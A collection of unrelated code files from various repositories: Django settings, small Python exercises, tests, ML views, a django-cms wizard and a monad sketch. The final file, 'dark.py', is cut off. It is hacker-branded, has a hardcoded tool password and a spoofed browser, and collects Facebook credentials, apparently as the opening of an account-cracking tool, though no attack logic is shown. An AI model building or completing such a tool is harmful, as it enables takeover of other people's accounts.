d06ada70739c3aa777999ebdcf12cc6e559e3ecc
|
6c3051357619ce844bd7d00811364d8ee45ebded
|
refs/heads/master
| 2020-06-05T20:35:50.715007
| 2019-06-18T12:54:36
| 2019-06-18T12:54:36
| 192,539,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,238
|
py
|
"""
Django settings for djresthw project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'yaxty8(=9ab9byq^k91h5rmuqo)dtl6=cx_7r&)(9=s+ce+%dp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djresthw.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'djresthw.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
|
[
"dan@smartsoftdev.eu"
] |
dan@smartsoftdev.eu
|
ab88d984c56fab8df7b123df290ae712ef6252cf
|
76e91717f7b2c20061de75f27c445736869b3051
|
/BasicCrickulator.py
|
74b0f39da27a49814e99642bd6c470ebc8265805
|
[] |
no_license
|
dalzuga/Crickulator
|
67047fb866038187c0107f3d2e7fbb761d2ed647
|
e0a53f77a55e5feb0b9671140bf09da369b3c0ef
|
refs/heads/master
| 2021-01-18T09:39:00.351126
| 2016-09-12T16:46:47
| 2016-09-12T16:46:47
| 68,026,214
| 0
| 0
| null | 2016-09-12T16:21:19
| 2016-09-12T16:21:19
| null |
UTF-8
|
Python
| false
| false
| 1,029
|
py
|
#!/bin/python
print"This program converts temperatures between Fahrenheit, Celsius, Kelvin, and Bug chirps."
temp, unit = raw_input("Please enter the temperature and the unit (F, C, K, or B): ").split()
temp = int(temp)
print temp
print unit
if unit == "F":
celsius = (temp - 32) / 1.8
kelvin = (temp + 459.67) * .55
chirps = (temp - 40) * 4
print("%d degrees Fahrenheit equals:\n\t%d Celsius\n\t%d Kelvin\n\t%d cricket chirps per minute\n") % (temp, celsius, kelvin, chirps)
#nope, didn't make up the cricket thing: http://www.scientificamerican.com/article/bring-science-home-cricket-temperature/
#write tests first
#needs to handle negatives
#could have better accuracy if using floats not ints everywhere?
#include over 100 F "too hot for crickets" and under 55 F "too cold for crickets", also a funny message for below freezing "cricketsicles don't chirp"?
#include funny message for lower than abs zero
#include funny message about "at -40 it's so cold that no one cares if it's F or C"
|
[
"nwilliammccann@gmail.com"
] |
nwilliammccann@gmail.com
|
3f84178579df9e1381f23307dfbcdebae314e114
|
503413c4e4b7f2b87797dcddcf16d2c3f2282016
|
/A4/test_breakdown_amount.py
|
008cf59cf8ed072b005e658c2bd718adbdf77281
|
[] |
no_license
|
marlonrenzo/A01054879_1510_assignments
|
c1475a3fd263a8a6a1234ffd0818a75706e6194f
|
f4a3f9af21f7170ba70c901bc22ff6d95a6e535f
|
refs/heads/master
| 2022-03-23T22:07:29.067075
| 2019-12-08T19:01:32
| 2019-12-08T19:01:32
| 209,661,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,464
|
py
|
from unittest import TestCase
from A4.Question_5 import breakdown_amount
class TestBreakdownAmount(TestCase):
def test_breakdown_amount_one_hundred_one(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 101.0
actual = breakdown_amount(test, test_amount)
expected = {100: 1, 1: 1}
self.assertEqual(actual, expected)
def test_breakdown_amount_4(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 4.0
actual = breakdown_amount(test, test_amount)
expected = {2: 2}
self.assertEqual(actual, expected)
def test_breakdown_amount_40_cents(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 0.4
actual = breakdown_amount(test, test_amount)
expected = {0.25: 1, 0.1: 1, 0.05: 1}
self.assertEqual(actual, expected)
def test_breakdown_amount_90_cents(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 0.4
actual = breakdown_amount(test, test_amount)
expected = {0.25: 1, 0.1: 1, 0.05: 1}
self.assertEqual(actual, expected)
def test_breakdown_amount_9(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 9.0
actual = breakdown_amount(test, test_amount)
expected = {5: 1, 2: 2}
self.assertEqual(actual, expected)
def test_breakdown_amount_4_cents(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 0.04
actual = breakdown_amount(test, test_amount)
expected = {0.01: 4}
self.assertEqual(actual, expected)
def test_breakdown_amount_int(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 4
expected = TypeError
self.assertRaises(expected, breakdown_amount, test)
def test_breakdown_amount_string(self):
test = {100: 0, 50: 0, 20: 0, 10: 0, 5: 0, 2: 0, 1: 0, 0.25: 0, 0.10: 0, 0.05: 0, 0.01: 0}
test_amount = 'five dollars'
expected = TypeError
self.assertRaises(expected, breakdown_amount, test, test_amount)
|
[
"marlonrfajardo@gmail.com"
] |
marlonrfajardo@gmail.com
|
7d2dd5d6386b11b1f3d8df9469fa3d749015aee6
|
4830c991616800e7e4d1e9da87f822655b996859
|
/Ch7E4_TriviaV1.3.0/high_score.py
|
c92ccc150bd0b8b9904ca95162f2fb8fded3c831
|
[] |
no_license
|
malmhaug/Py_AbsBegin
|
daf72786e11118a5586a169ea66203f615fbaeed
|
c1e12491a4998c35e86e46010adf9a14e735d667
|
refs/heads/master
| 2021-01-17T13:20:04.143941
| 2016-08-01T18:24:29
| 2016-08-01T18:24:29
| 48,393,823
| 7
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,742
|
py
|
import sys
def open_file(file_name, mode):
"""Open a file."""
try:
the_file = open(file_name, mode)
except IOError as e:
print("Unable to open the file", file_name, "Ending program.\n", e)
input("\n\nPress the enter key to exit.")
sys.exit()
else:
return the_file
def high_scores(score):
new_lines = []
no_name = 0
name = input("\nEnter your name --> ")
score_file = open_file("high_scores.txt", "r")
lines = score_file.readlines()
score_file.close()
# If file is empty, write name and score
if len(lines) < 1:
print("Empty file")
new_lines.append(str(score) + ':' + name + '\n')
# Transfer from lines to new_lines
for entry in lines:
new_lines.append(entry)
# Check for new names
for entry in range(len(new_lines)):
if new_lines[entry].find(name) == -1:
no_name += 1
if no_name >= len(new_lines):
print("New name")
new_lines.append(str(score) + ':' + name + '\n')
# Check score for names already in list
for entry in range(len(new_lines)):
position = new_lines[entry].find(':')
old_score = int(new_lines[entry][:position])
if name in new_lines[entry] and old_score < score:
print("New score for person in list")
new_lines[entry] = str(score) + ':' + name + '\n'
# Sort list
new_lines.sort(reverse=True)
print("HIGH SCORE\n")
for entry in new_lines:
print(entry)
score_file = open_file("high_scores.txt", "w")
score_file.writelines(new_lines)
score_file.close()
if __name__ == '__main__':
high_scores(16)
|
[
"malmhaug@gmail.com"
] |
malmhaug@gmail.com
|
befd93169d42e555fdce72b8a3b9244d111ec2e2
|
524885e37b29d9bb6fe86017d41691cf8e74050d
|
/kungfu_blog/settings.py
|
55063af89ea5601bb82fd6489455a4d818b5fdee
|
[] |
no_license
|
manas-anarov/kungfu_blog
|
1cc3cd2f6e0a3afd98e5089c198677eea08b71b7
|
6fa88805ed3921406f4d34cd962eaa3e3250a1d7
|
refs/heads/master
| 2020-07-11T12:06:14.720355
| 2019-08-27T11:50:22
| 2019-08-27T11:50:22
| 204,534,701
| 0
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,329
|
py
|
"""
Django settings for kungfu_blog project.
Generated by 'django-admin startproject' using Django 2.0.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3#=+amb1f51b12eryfo+zer9pi!6x016fk-af=^6mxdlhuwy&e'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'mypost',
'myprofile',
'myaccount',
'restpost',
'restaccount',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'kungfu_blog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'kungfu_blog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'restaccount.DriverUser'
LOGIN_REDIRECT_URL = '/profile/list'
|
[
"microsoft.kg@mail.ru"
] |
microsoft.kg@mail.ru
|
a593bb9c456bb9b578077de9086795fec3de27e3
|
0d38affd6dd98a7e3d5400fb090f15f2e5b84328
|
/web_app/views.py
|
00684a672016809e5af4438d2f505ce0fca3276d
|
[] |
no_license
|
sangireddyabhilash/FASTSIM
|
400e47386b17f4ea9c077038cd1ee488319f5500
|
286a5b4464851297667296f9cc355195765d2423
|
refs/heads/master
| 2020-08-30T04:23:23.133878
| 2019-10-29T10:55:13
| 2019-10-29T10:55:13
| 218,261,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,690
|
py
|
from django.shortcuts import render
from rest_framework.views import APIView
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.parsers import MultiPartParser
from rest_framework.response import Response
from rest_framework.exceptions import APIException
from itertools import product
from .serializers import Forum1, Forum2
from sklearn.cluster import KMeans
from sklearn.preprocessing import MinMaxScaler
from sklearn.tree import DecisionTreeRegressor
from sklearn.linear_model import LinearRegression, Ridge, BayesianRidge, RANSACRegressor, TheilSenRegressor, HuberRegressor, Lasso
from sklearn.svm import SVR
from sklearn.neighbors import KNeighborsRegressor
import csv
from django.http import HttpResponse
import pandas as pd
import numpy as np
from io import StringIO
class Forum1View(APIView):
renderer_classes = [ TemplateHTMLRenderer,]
template_name = "forum1.html"
def get(self, request):
serializer = Forum1()
return Response({"serializer":serializer})
def post(self, request):
data = {"num_clusters":request.data["num_clusters"]}
for key in ['wwr', 'ar', 'orin', 'shgc', 'oh']:
data[key] = list(map(float, request.data[key].split(",")))
ser = Forum1(data = data)
if ser.is_valid():
key_lists = []
for key in ['wwr', 'ar', 'orin', 'shgc', 'oh']:
key_lists.append(data[key])
combinations = list(product(*key_lists))
print(combinations)
k_means = KMeans(n_clusters = ser.data["num_clusters"])
k_means.fit(combinations)
centers = k_means.cluster_centers_.tolist()
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="somefilename.csv"'
writer = csv.writer(response)
writer.writerows(centers)
return response
print(ser.errors)
return APIException()
class Forum2View(APIView):
renderer_classes = [ TemplateHTMLRenderer,]
template_name = "forum2.html"
parser_classes = [MultiPartParser,]
def get(self, request):
serializer = Forum2()
return Response({"serializer":serializer})
def __get_regressor(self, choice):
if choice == "des_tree":
return DecisionTreeRegressor
if choice == "linear_reg":
return LinearRegression
if choice == "svr":
return SVR
if choice == "ridge":
return Ridge
if choice == "lasso":
return Lasso
if choice == "bayesian_ridge":
return BayesianRidge
if choice == "ransac":
return RANSACRegressor
if choice == "theil_sen":
return TheilSenRegressor
if choice == "huber_reg":
return HuberRegressor
if choice == "k_neighbor":
return KNeighborsRegressor
def post(self, request):
csv_file = StringIO(request.data["csv"].read().decode("utf-8"))
dataTrain = pd.read_csv(csv_file)
trainingData = dataTrain[['WWR','AR','ORIN','OVERHANG','SHGC']]
trainingScores = dataTrain['ENERGY']
trainingData = trainingData.values
trainingScores = trainingScores.values
min_max_scaler = MinMaxScaler()
trainingData = min_max_scaler.fit_transform(trainingData)
data = {}
for key in ['wwr', 'ar', 'orin', 'oh', 'shgc']:
data[key] = list(map(float, request.data[key].split(",")))
data["regressor"] = request.data["regressor"]
ser = Forum2(data = data)
if not ser.is_valid():
return APIException()
key_lists = []
for key in ['wwr', 'ar', 'orin', 'oh', 'shgc']:
key_lists.append(data[key])
combinations = list(product(*key_lists))
predictionData = np.array(combinations)
predictionData = min_max_scaler.fit_transform(predictionData)
regressor = self.__get_regressor(data["regressor"])
clf = regressor()
clf.fit(trainingData, trainingScores)
results = clf.predict(predictionData)
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="results.csv"'
writer = csv.DictWriter(response, ['wwr', 'ar', 'orin', 'oh', 'shgc',"scores"])
for i in range(predictionData.shape[0]):
writer.writerow({"wwr":combinations[i][0],"ar":combinations[i][1],"orin":combinations[i][2],"oh":combinations[i][3],"shgc":combinations[i][4],"scores":results[i]})
return response
|
[
"abhilash.sangireddy@sprinklr.com"
] |
abhilash.sangireddy@sprinklr.com
|
fc0d048ffd7503c409ac2f5cf15aa5e8d92a10f5
|
38ad0af18203d8c21458e5f83434cc338a477bd3
|
/v1/maybe.py
|
bc164db0efef75b88068be9aeb49032f5081f79a
|
[] |
no_license
|
OaklandPeters/learning_monads
|
111c39f6285de9ada7c08960b88f1e3a89338637
|
9af7ffad2e2ca5f3275f47cff1052fe83e093598
|
refs/heads/master
| 2016-08-12T15:42:35.762982
| 2016-05-09T19:05:42
| 2016-05-09T19:05:42
| 49,683,084
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,467
|
py
|
#!/usr/bin/env python3
"""
Ok, I'm just arbitarily defining this 'Maybe' as Maybe error.
Idea for treatment:
Have 'lift' just be a wrap (even when used as a decorator).
So, that lift(function) --> an object whose __call__ triggers f_apply
"""
from typing import Callable, TypeVar, Iterator, Any
from monad import Monad, classproperty
AccessorErrors = (AttributeError, IndexError, KeyError)
def maybe_error(*exceptions):
"""
Turns a normal function into one returning Maybe.
This is basically 'fmap' for Maybe.
Although, you have to pass it an exception type first.
"""
def wrapper(function):
def wrapped(*args, **kwargs):
try:
return Just(function(*args, **kwargs))
except *exceptions:
return Nothing()
return wrapped
return wrapper
class Maybe:
def __init__(self, *elements, exceptions=AccessorErrors):
self.exceptions = exceptions
self.data = elements
def f_apply(self, function):
try:
return Just(function(*self.data))
except self.exceptions:
return Nothing()
def f_map(self):
def wrapped(*args, **kwargs):
function = self.data[0] # This is not a safe assumption, that there is exactly 1 elem
try:
return Just(function(*args, **kwargs))
except self.exceptions:
return Nothing()
return wrapped
|
[
"oakland.peters@gmail.com"
] |
oakland.peters@gmail.com
|
1b29971349c8bd365a97cad27882735328b1de32
|
b8aa670d8328ac47d4cd9849a8c1624731f46674
|
/webapp/views/index.py
|
d61f3e5381f42a61b5f0eec5874c363a1f4df5f6
|
[] |
no_license
|
danlliu/webapp
|
54744c2304652a3dd08ed76dfa16243a08fec3de
|
18278131e3e8fe208640ff5751e8c53a7b82689e
|
refs/heads/main
| 2023-09-03T05:19:22.548631
| 2021-10-28T03:54:48
| 2021-10-28T03:54:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 624
|
py
|
import flask
from flask import request, session
import webapp
@webapp.app.route('/')
def webapp_index():
if 'username' in session:
return flask.render_template('index.html', **{'logname': session['username']})
return flask.render_template('index-nologin.html')
@webapp.app.route('/users/')
@webapp.app.route('/users/<username>/')
@webapp.app.route('/profile/')
@webapp.app.route('/friends/')
def webapp_alt_index(username=None):
if 'username' in session:
return flask.render_template('index.html', **{'logname': session['username']})
return flask.redirect(flask.url_for('webapp_index'))
|
[
"danlliu@umich.edu"
] |
danlliu@umich.edu
|
14248fcb0ff7af8bc89af5140584b7be4da9c118
|
fd547ec5dd01039b5a0b89c1e3c14e39a7532f37
|
/cms/wizards/views.py
|
6e55e3d0d7e459337cf0884c6f38f084279bbe8b
|
[
"BSD-3-Clause"
] |
permissive
|
leoiceo/django-cms
|
30e4a7a4b0b8555613368b28ba4dfb8eee4dac8b
|
2709fa6ffb5f4fadba91da48a2557438c0edc576
|
refs/heads/develop
| 2021-01-18T04:41:51.724354
| 2015-10-22T17:16:23
| 2015-10-22T17:16:23
| 44,788,187
| 0
| 1
| null | 2015-10-23T03:18:39
| 2015-10-23T03:18:39
| null |
UTF-8
|
Python
| false
| false
| 5,416
|
py
|
# -*- coding: utf-8 -*-
import os
from django.forms import Form
from django.conf import settings
from django.core.files.storage import FileSystemStorage
from django.db import transaction
from django.template.response import SimpleTemplateResponse
from django.utils.translation import get_language_from_request
try:
# This try/except block can be removed when we stop supporting Django 1.6
from django.contrib.formtools.wizard.views import SessionWizardView
except ImportError: # pragma: no cover
# This is fine from Django 1.7
from formtools.wizard.views import SessionWizardView
from cms.models import Page
from .wizard_pool import wizard_pool
from .forms import (
WizardStep1Form,
WizardStep2BaseForm,
step2_form_factory,
)
class WizardViewMixin(object):
language_code = None
@transaction.atomic()
def dispatch(self, request, *args, **kwargs):
self.language_code = get_language_from_request(request, check_path=True)
response = super(WizardViewMixin, self).dispatch(
request, *args, **kwargs)
return response
def get_form_kwargs(self):
kwargs = super(WizardViewMixin, self).get_form_kwargs()
kwargs.update({'wizard_language': self.language_code})
return kwargs
class WizardCreateView(WizardViewMixin, SessionWizardView):
template_name = 'cms/wizards/start.html'
file_storage = FileSystemStorage(
location=os.path.join(settings.MEDIA_ROOT, 'wizard_tmp_files'))
form_list = [
('0', WizardStep1Form),
# Form is used as a placeholder form.
# the real form will be loaded after step 0
('1', Form),
]
def get_current_step(self):
"""Returns the current step, if possible, else None."""
try:
return self.steps.current
except AttributeError:
return None
def is_first_step(self, step=None):
step = step or self.get_current_step()
return step == '0'
def is_second_step(self, step=None):
step = step or self.get_current_step()
return step == '1'
def get_context_data(self, **kwargs):
context = super(WizardCreateView, self).get_context_data(**kwargs)
if self.is_second_step():
context['wizard_entry'] = self.get_selected_entry()
return context
def get_form(self, step=None, data=None, files=None):
if step is None:
step = self.steps.current
# We need to grab the page from pre-validated data so that the wizard
# has it to prepare the list of valid entries.
if data:
page_key = "{0}-page".format(step)
self.page_pk = data.get(page_key, None)
else:
self.page_pk = None
if self.is_second_step(step):
self.form_list[step] = self.get_step_2_form(step, data, files)
return super(WizardCreateView, self).get_form(step, data, files)
def get_form_kwargs(self, step=None):
"""This is called by self.get_form()"""
kwargs = super(WizardCreateView, self).get_form_kwargs()
kwargs['wizard_user'] = self.request.user
if self.is_second_step(step):
kwargs['wizard_page'] = self.get_origin_page()
else:
page_pk = self.page_pk or self.request.GET.get('page', None)
kwargs['wizard_page'] = Page.objects.filter(pk=page_pk).first()
return kwargs
def get_form_initial(self, step):
"""This is called by self.get_form()"""
initial = super(WizardCreateView, self).get_form_initial(step)
if self.is_first_step(step):
initial['page'] = self.request.GET.get('page')
return initial
def get_step_2_form(self, step=None, data=None, files=None):
entry_form_class = self.get_selected_entry().form
step_2_base_form = self.get_step_2_base_form()
form = step2_form_factory(
mixin_cls=step_2_base_form,
entry_form_class=entry_form_class,
)
return form
def get_step_2_base_form(self):
"""
Returns the base form to be used for step 2.
This form is sub classed dynamically by the form defined per module.
"""
return WizardStep2BaseForm
def get_template_names(self):
if self.is_first_step():
template_name = self.template_name
else:
template_name = self.get_selected_entry().template_name
return template_name
def done(self, form_list, **kwargs):
"""
This step only runs if all forms are valid. Simply emits a simple
template that uses JS to redirect to the newly created object.
"""
form_two = form_list[1]
instance = form_two.save()
context = {
"url": self.get_success_url(instance),
}
return SimpleTemplateResponse("cms/wizards/done.html", context)
def get_selected_entry(self):
data = self.get_cleaned_data_for_step('0')
return wizard_pool.get_entry(data['entry'])
def get_origin_page(self):
data = self.get_cleaned_data_for_step('0')
return data.get('page')
def get_success_url(self, instance):
entry = self.get_selected_entry()
success_url = entry.get_success_url(
obj=instance,
language=self.language_code
)
return success_url
|
[
"mkoistinen@gmail.com"
] |
mkoistinen@gmail.com
|
c9a133dd357d3b31b1ef805daf0f051cdb6e004d
|
f25522aef57cbe5e3d6970ed2d9d1f0d8e1901d0
|
/FYP/Code/sample.py
|
dc125c6572c128990961beac3d3b326b0fdcc0ed
|
[] |
no_license
|
txs640/FinalYearProject
|
75f615a53fdb71043e2dfad0deca3434415d877a
|
b6ae7dad29e19a28138b2c4f6d185dc1fb25a23a
|
refs/heads/master
| 2020-04-08T00:04:51.173940
| 2019-01-18T19:04:38
| 2019-01-18T19:04:38
| 158,837,036
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 29
|
py
|
function setup(){
}
|
[
"txs640@student.bham.ac.uk"
] |
txs640@student.bham.ac.uk
|
2f7549c4baa76bb0dbc1bf9eacce548d49027078
|
ae9ffbe5924eedbac57af535d0f20819b58f3bcb
|
/examples/myblog/models/models.py
|
da68560df66b05b146de3208eeed115feb504aef
|
[] |
no_license
|
natsuooo/fujitsu
|
d981946c66bca5be1e6cac89393f61cab6355cf2
|
866f0218776642842a769afb0ccafe9c7b5e32a2
|
refs/heads/master
| 2023-03-17T14:55:17.511679
| 2021-02-22T01:27:10
| 2021-02-22T01:27:10
| 338,940,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 966
|
py
|
from sqlalchemy import Column, Integer, String, Text, DateTime
from datetime import datetime
from models.database import Base
class BlogContent(Base):
__tablename__ = "blogcontent"
id = Column(Integer,primary_key=True)
title = Column(String(128),unique=True)
body = Column(Text)
date = Column(DateTime,default=datetime.now())
def __init__(self, title=None,body=None,date=None):
self.title = title
self.body = body
self.date = date
def __repr__(self):
return "<BlogContent(title='%s',body='%s',date='%s')>" % (self.title, self.body,self.date)
class Users(Base):
__tablename__ = "users"
id = Column(Integer,primary_key=True)
name = Column(Text,unique=True)
password = Column(Text)
def __init__(self,name=None,password=None):
self.name = name
self.password = password
def __repr__(self):
return "<Users(name='%s', password='%s')>" % (self.name, self.password)
|
[
"n17975775@gmail.com"
] |
n17975775@gmail.com
|
54c71ab19988dc61b1d5006d7e3fb63925a63436
|
2ff2d654688cf8687c0806135057c747763f9cbc
|
/.github/workflows/dark.py
|
ac99b00dce47474159cbc869011802a04be1b760
|
[] |
no_license
|
darshankhakhodiya143/dark1
|
61f27a14c2afe9cf3e22c39339ffcdf11a408796
|
924859631a950ca86ae786a5f5c3c4954b6a5117
|
refs/heads/master
| 2022-10-11T15:44:50.662945
| 2020-06-12T09:29:34
| 2020-06-12T09:29:34
| 271,526,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,817
|
py
|
#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
\033[1;91m ♦♦♦———————————————————————————————♦♦♦
\033[1;96m ITX D4RSH4N H3R3
\033[1;91m ♦♦♦———————————————————————————————♦♦♦
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97m DARK FAMILY X3 BABSA
"""
jalan("\033[1;97m•◈•───────•◈ NOT A NAME ITS BRAND •◈•───────•◈•")
jalan("\033[191m DARSHAN H3R3
jalan(" \033[1;91m INDAIN USERZ USE ANY PROXY ")
jalan(" \033[1;91m WIFI USERZ USE ANY PROXY ")
jalan(" \033[1;93m Welcome to Af2 Creations ")
jalan("\033[1;97m•◈•──────────•◈•\033[1;96mTheDarkFamily\033[1;96m•◈•──────────•◈•")
CorrectUsername = "dark"
CorrectPassword = "dark"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;97mUSER ID \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;97mPASWORD \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 50*"\033[1;96m▪"
print(' \033[1;97m[◉] \x1b[1;96mLogin New Fresh Account \033[1;97m[◉]' )
id = raw_input(' \033[1;97m[◉] \033[1;97mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input(' \033[1;97m[◉] \033[1;97mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
